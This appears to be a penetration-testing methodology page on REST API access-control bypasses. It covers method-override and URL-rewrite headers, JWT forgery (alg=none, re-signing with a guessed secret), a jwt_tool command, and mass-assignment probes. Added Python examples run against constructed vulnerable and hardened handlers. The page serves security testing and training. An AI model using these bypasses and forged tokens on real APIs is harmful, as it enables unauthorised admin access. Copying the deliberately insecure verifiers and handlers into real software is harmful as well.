REST API - Bypasses and Privilege Escalations

REST API security testing


Last updated 3 days ago


Methodology

Bypassing API filter and ACL by rewriting HTTP methods and URLs

Front-end filters (WAF, API gateway, reverse proxy) usually apply their ACL to the method and path in the request line, while the back-end framework may honour method-override and URL-rewrite headers. Send a request the filter allows (for example a POST to a permitted path) and add one of the headers below to make the back end execute a different method or path. HTTP header names are case-insensitive, but naive string-matching filters are not, so the case variants are worth trying as well:

X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-Http-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser
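The following is an added example, not code from the original page: it generates one probe per header from the list above and runs them through a constructed front-end ACL and a constructed back end that honours override headers, showing which probes slip a blocked DELETE or a blocked /admin path past the filter. The ACL rules, the endpoint names and the hardened back end are assumptions made for illustration; only the header names come from the page.

```python
"""
Added example (not from the original page): how method-override and URL-rewrite
headers let a request that passes a front-end ACL execute something else on the
back end. ACL rules, endpoints and both back ends are constructed for illustration.
"""
from dataclasses import dataclass, field

# Header names from the list above, grouped by what they rewrite.
METHOD_OVERRIDE_HEADERS = [
    "X-HTTP-Method", "X-HTTP-Method-Override", "X-Http-Method-Override",
    "X-Http-Method", "X-Method-Override", "X-Original-Method",
]
URL_REWRITE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def build_probes(method, path, target_method, target_path):
    """One probe per header: an innocuous request line carrying the override."""
    probes = [Request(method, path, {h: target_method}) for h in METHOD_OVERRIDE_HEADERS]
    probes += [Request(method, path, {h: target_path}) for h in URL_REWRITE_HEADERS]
    return probes


def frontend_acl(req):
    """Constructed front end: blocks DELETE and /admin/* by looking at the request line only."""
    if req.method.upper() == "DELETE":
        return False
    if req.path.startswith("/admin"):
        return False
    return True


def backend_effective(req):
    """Constructed back end that honours override headers (as some frameworks and
    proxies do). Header lookup is case-insensitive, as HTTP requires."""
    lower = {k.lower(): v for k, v in req.headers.items()}
    method, path = req.method.upper(), req.path
    for h in METHOD_OVERRIDE_HEADERS:
        if h.lower() in lower:
            method = lower[h.lower()].upper()
            break
    for h in URL_REWRITE_HEADERS:
        if h.lower() in lower:
            path = lower[h.lower()]
            break
    return method, path


def hardened_backend_effective(req):
    """Fix: ignore override headers (or strip them at the edge); the request line is authoritative."""
    return req.method.upper(), req.path


def find_bypasses(probes, blocked_method, blocked_path, backend=backend_effective):
    """Probes that pass the ACL yet make the back end execute a blocked method or path."""
    hits = []
    for p in probes:
        if not frontend_acl(p):
            continue
        method, path = backend(p)
        if method == blocked_method or path == blocked_path:
            hits.append((next(iter(p.headers)), method, path))
    return hits


if __name__ == "__main__":
    probes = build_probes("POST", "/api/user", "DELETE", "/admin/deleteUser")
    for header, m, p in find_bypasses(probes, "DELETE", "/admin/deleteUser"):
        print(f"{header}: front end saw POST /api/user, back end executed {m} {p}")
    print("hardened back end:", find_bypasses(probes, "DELETE", "/admin/deleteUser",
                                              backend=hardened_backend_effective))
```

Against a real target, send the same probes with Burp Intruder or curl and compare status codes and bodies between the plain request and each header variant; a differing response for an override header is the signal to dig into.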

Access Admin Interface

Admin interfaces are often restricted to a trusted client's IP address or Host. Check whether that trust can be claimed from outside with forwarding headers (X-Forwarded-For, X-Forwarded-Host and relatives; see the HTTP Headers - X-Forwarded page) or by reaching the admin path through the URL-rewrite headers above while the request line points at an allowed path.

JWT Access Token Tampering

JWT Editor: Burp plugin, available in the BApp store. Besides editing claims and re-signing, explore the advanced JWT header parameter attacks (jwk, jku and kid injection) described in the PortSwigger JWT article linked below.

JWT Tool (jwt_tool; see the attack methodology wiki linked below). Run the playbook scan (-M pb) against an authenticated endpoint, passing the captured token and the original request body and headers with -rh:

python3 ./jwt_tool.py -M pb -t http://URL:5001/api/method -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"
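As an added example (not the page's or jwt_tool's code), the two most basic tampering moves from the playbook, written with the standard library so they run offline: rewriting a claim and declaring alg=none, and rewriting a claim and re-signing with a guessed HS256 secret. Next to them sit an insecure consumer that trusts the header's alg and the strict check an API must perform. The signing key, the claims and the "role" field are constructed for illustration.

```python
"""
Added example (not from the original page or jwt_tool): JWT access-token tampering
with the standard library, plus the check a consuming API must perform.
Key, claims and field names are constructed for illustration.
"""
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _encode(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a legitimate HS256 token (what the server does at login)."""
    signing_input = _encode({"alg": "HS256", "typ": "JWT"}) + "." + _encode(payload)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def decode_unverified(token: str):
    """Split and decode a token WITHOUT checking the signature (attacker's first step)."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def tamper_alg_none(token: str, changes: dict) -> str:
    """Attack 1: edit claims, set alg=none, send an empty signature.
    jwt_tool also tries the case variants None/NONE/nOnE; this shows the lowercase one."""
    header, payload, _ = decode_unverified(token)
    header["alg"] = "none"
    payload.update(changes)
    return _encode(header) + "." + _encode(payload) + "."


def tamper_resign(token: str, changes: dict, guessed_key: bytes) -> str:
    """Attack 2: edit claims and re-sign with a guessed or cracked HS256 secret."""
    _, payload, _ = decode_unverified(token)
    payload.update(changes)
    return sign_hs256(payload, guessed_key)


def _mac_matches(token: str, sig: str, key: bytes) -> bool:
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = b64url(hmac.new(key, signing_input, hashlib.sha256).digest())
    return hmac.compare_digest(expected, sig)


def verify_insecure(token: str, key: bytes):
    """Vulnerable consumer: lets the token's own header decide whether to check the MAC."""
    header, payload, sig = decode_unverified(token)
    if header.get("alg") == "none":
        return payload
    return payload if _mac_matches(token, sig, key) else None


def verify_strict(token: str, key: bytes):
    """Hardened consumer: pins the algorithm server-side and always checks the MAC."""
    header, payload, sig = decode_unverified(token)
    if header.get("alg") != "HS256":
        return None
    return payload if _mac_matches(token, sig, key) else None


if __name__ == "__main__":
    KEY = b"server-secret-constructed-for-the-example"
    token = sign_hs256({"sub": "alice", "role": "user"}, KEY)
    forged = tamper_alg_none(token, {"role": "admin"})
    print("insecure consumer accepts alg=none forgery:", verify_insecure(forged, KEY))
    print("strict consumer rejects it:", verify_strict(forged, KEY))
```

The second attack only works when the secret is weak enough to guess or crack (jwt_tool's -C mode with a wordlist does that); against a properly random key the re-signed token fails both consumers, which is the expected result.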

Mass Assignment

Observe the object properties the API returns (for example in the response to fetching or creating a user) and try to set them yourself in create and update requests; search for hidden parameters with the Param Miner Burp extension. A typical probe on a user-creation endpoint:

POST /api/user/create HTTP/1.1
Host: server
Content-Type: application/json

{"admin": true}
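Added example, not code from the original page: a create-user handler that binds the whole JSON body onto the user record (the mass-assignment bug) beside an allowlisted version, and a small local probe in the spirit of the Param Miner step that reports which hidden properties the handler accepts. The user model, its field names and the request bodies are constructed for illustration.

```python
"""
Added example (not from the original page): mass assignment on /api/user/create,
vulnerable and hardened, plus a probe that reports which hidden properties stick.
Model, field names and bodies are constructed for illustration.
"""
import json

# Fields a client is permitted to set on /api/user/create (constructed allowlist).
WRITABLE_FIELDS = {"username", "email", "password"}


def new_user_defaults():
    """Server-side record with privileged fields a client must never control."""
    return {"username": None, "email": None, "password": None,
            "admin": False, "verified": False, "credits": 0}


def create_user_vulnerable(body: str) -> dict:
    """Binds every key the client sent onto the record: 'admin': true lands as-is."""
    user = new_user_defaults()
    user.update(json.loads(body))
    return user


def create_user_hardened(body: str) -> dict:
    """Binds only allowlisted keys and rejects the request if anything else is present,
    so a probe shows up as a 400 in the logs instead of silently succeeding."""
    data = json.loads(body)
    unexpected = sorted(set(data) - WRITABLE_FIELDS)
    if unexpected:
        raise ValueError(f"unexpected fields: {unexpected}")
    user = new_user_defaults()
    for k in WRITABLE_FIELDS & set(data):
        user[k] = data[k]
    return user


def probe_hidden_fields(handler, base_body: dict, candidates: dict) -> list:
    """Attacker side: add one candidate property at a time and see which ones the
    created object reflects back. Works the same way as sending the candidates
    to the live endpoint and diffing the responses."""
    accepted = []
    for name, value in candidates.items():
        body = dict(base_body, **{name: value})
        try:
            result = handler(json.dumps(body))
        except ValueError:
            continue  # hardened handler refused the request
        if result.get(name) == value:
            accepted.append(name)
    return accepted


if __name__ == "__main__":
    base = {"username": "eve", "email": "eve@example.com", "password": "pw"}
    candidates = {"admin": True, "verified": True, "credits": 9999, "role": "root"}
    print("vulnerable accepts:", probe_hidden_fields(create_user_vulnerable, base, candidates))
    print("hardened accepts:", probe_hidden_fields(create_user_hardened, base, candidates))
```

The candidate names come from whatever the API already showed you: fields in GET responses, in other users' objects, in JavaScript bundles and OpenAPI documents; Param Miner automates the guessing with its own wordlists.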

API Tester

OWASP OFFAT (OFFensive Api Tester) generates test cases from an OpenAPI/Swagger specification and runs them against the API automatically; repository linked below. For a manual methodology, see the Web Security Academy API testing topic and the PortSwigger Academy cheat sheets (API Testing section), both linked below.

Vulnerable API Project to practice with

Damn Vulnerable RESTaurant API Game: an intentionally vulnerable Web API game for learning and training, aimed at developers, ethical hackers and security engineers (linked below).

Links

  • PortSwigger Web Security Academy, JWT header parameter injections: https://portswigger.net/web-security/jwt#jwt-header-parameter-injections
  • jwt_tool attack methodology: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
  • API testing | Web Security Academy: https://portswigger.net/web-security/api-testing
  • ChrisM-X/PortSwigger-Academy-CheatSheets (API Testing): https://github.com/ChrisM-X/PortSwigger-Academy-CheatSheets
  • PortSwigger/jwt-editor: a Burp Suite extension and standalone application for creating and editing JSON Web Tokens; supports JWS signing and verification, JWE encryption and decryption, and automation of several well-known attacks against applications that consume JWTs: https://github.com/PortSwigger/jwt-editor
  • OWASP/OFFAT: https://github.com/OWASP/OFFAT
  • theowni/Damn-Vulnerable-RESTaurant-API-Game: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game